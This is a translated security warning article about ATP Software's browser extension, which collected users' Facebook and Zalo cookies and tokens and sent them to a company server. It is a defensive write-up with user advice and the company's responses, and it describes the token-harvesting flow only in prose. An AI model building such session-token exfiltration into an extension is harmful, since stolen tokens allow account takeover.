Popular warning

From the ATP software incident, beware of potentially harmful extensions

In late June and early July 2023, the Anti-Fraud Team (CLĐ) had a debate with ATP Software about the issue of ATP's extension collecting cookies for users' Facebook and Zalo logins. So what is the harm in collecting such information? You can […] from From the ATP software incident, beware of potentially harmful extensions

Avatar photo

by Editor

schedule 01/07/2023

Late June, early July 2023, team Anti-Phishing (CLD) had a debate with ATP Software about the issue of ATP's extension collecting cookies for users' Facebook and Zalo logins. So what is the harm in collecting such information? You can learn more with the article below.

Article table of contents hide
Extension of ATP
1. Processing of sending user tokens and cookies on the backend of the ATPsoftware server
2. Storing and using user tokens and cookies on the server
3. Installing the extension
4. Legal issues of storing tokens and cookies
Warning to users

Extension of ATP

ATP extension is an extension that supports quickly retrieving cookies from Facebook and Zalo. But this extension cannot be installed directly through the app stores of browsers like Edge and Chrome, forcing users to download and install it manually.

A technical member of the CLĐ team, Chi Tran, has a technical analysis article about ATP's extension, you can see the details at This.

Basically, this extension contains a suspicious piece of code that steals user cookies in the popup.js file with the following process:

  • Stealing tokens from extensions
  • Synthesize tokens into 1 batch, push to token[.]atpsoftware[.]vn
  • These Facebook and Zalo tokens can be abused in seeding tools sold on the market
The code checks to see if you are accessing Facebook or Zalo
The code is intended to push tokens to ATP Software's server

Immediately after the CLĐ team issued the above warning, a representative of ATP Software responded as follows:

  • The extension only supports users to retrieve cookies and tokens for their accounts on the browser
  • Pushing tokens to the server and displaying them on token[.]atpsoftware[.]vn is an SEO strategy of this company, to take advantage of views (also known as traffic) of cookies and tokens to support access. SEO work.

After better understanding the intention and operation of this extension, the Anti-Fraud team has recognized many security risks, ensuring the safety of social network accounts as well as personal information. of users when using this extension.

1. Processing of sending user tokens and cookies on the backend of the ATPsoftware server

  • Our Anti-Fraud Team confirms that this practice is not recommended in ensuring user information security. Instead of being able to handle it completely right on the client-side through extension.
  • Team ATPsoftware has acknowledged this is a shortcoming and will move to completely handle it right on the client-side through extensions in the new updated version.

2. Storing and using user tokens and cookies on the server

  • The Anti-Fraud Team in particular and users in general cannot verify and control how user tokens and cookies will be stored, used, exchanged or traded on the backend server side. While cookies and tokens are important information, they can be used to take over accounts.
  • Team ATPsoftware once again affirmed that they do not intend to store or trade this data, but will also remove this part in the latest updated version to avoid misunderstandings and ensure information security for users.

3. Installing the extension

  • Normally, official extensions will be installed through the browser store. To be approved into the store, extensions need to ensure certain standards to ensure user safety. However, ATPsoftware's extension cannot be found on the official store and must be installed manually from the user.
  • ATPsoftware confirmed that this utility was originally used by 100% within the company's customers for marketing. Because we realized that Chrome does not support users to install through the store and there are many addons still circulating in the market without going through the store, the team subjectively did not upload to the store.
  • Team ATP has admitted it was completely wrong and guaranteed that it will fix it by remaking a new extension, completing the security errors according to the comments of the Anti-Fraud team and will upload it to the store in the near future.

4. Legal issues of storing tokens and cookies

  • According to research and consultation from lawyers, Anti-Fraud determined that ATPSoftware violated a number of provisions of Decree 13/2023/ND-CP and criminal law article 289. Because of token data, cookies of users data is extremely sensitive and can be misused.
  • Not to mention this data when calling back token[.]atpsoftware[.]vn use GET method The parameter containing data will be written to the access log of the web server with IP 45.77.47.127, this means the user's token and cookie have been stored on the server.
  • ATPsoftware has fully admitted that this problem was its fault as the ATP dev team lacked knowledge about security and server administration, leading to not knowing that using the GET method on the path would cause history storage problems. access a link that contains sensitive information in that link.
  • But for the ATP team, this is really a problem due to lack of information security knowledge and not the intention of saving customers' cookies/extensions.
  • This is an unexpected flaw and ATPsoftware has admitted mistakes in the software construction stage due to a lack of knowledge in managing technical personnel when programming software. Team ATP will fix the vulnerability and fix this problem as soon as possible

Warning to users

Currently, there are many add-on extensions created from many different sources, supporting users with many different tasks. But most ordinary users do not really care about safety issues when using these utilities.

Since 2020, security experts have warned that a series of Chrome browser extensions contain malicious code that threatens the security of users' information. These malicious codes masquerading as utilities target information such as user account login data, serving hackers to attack financial systems, healthcare or government organizations.

Last June, a security expert continued to warn about 34 Chrome browser extensions containing malicious code that steals personal information, posing a risk of data loss for 87 million users globally.

The case of ATPsoftware not only continues to be a warning bell for users to be aware of protecting sensitive personal information from the dangers lurking in their own devices, but also a warning to programmers. , business managers about the importance of ensuring information security as well as knowledge about this issue if they do not want their products to become tools for hackers.

To protect you in the online environment, Anti-Phishing would like to give some advice on using extensions on browsers.

  • DO NOT manually install extensions that are not available on browser stores
  • You should NOT use extensions for the purpose of interfering with sensitive personal information if you do not really understand how it works.
  • DO NOT install extensions that you do not understand.
  • SHOULD consult and ask questions of people knowledgeable about information security before installation.

Related Posts

Leave a Reply

Your email address will not be published. Required fields are marked *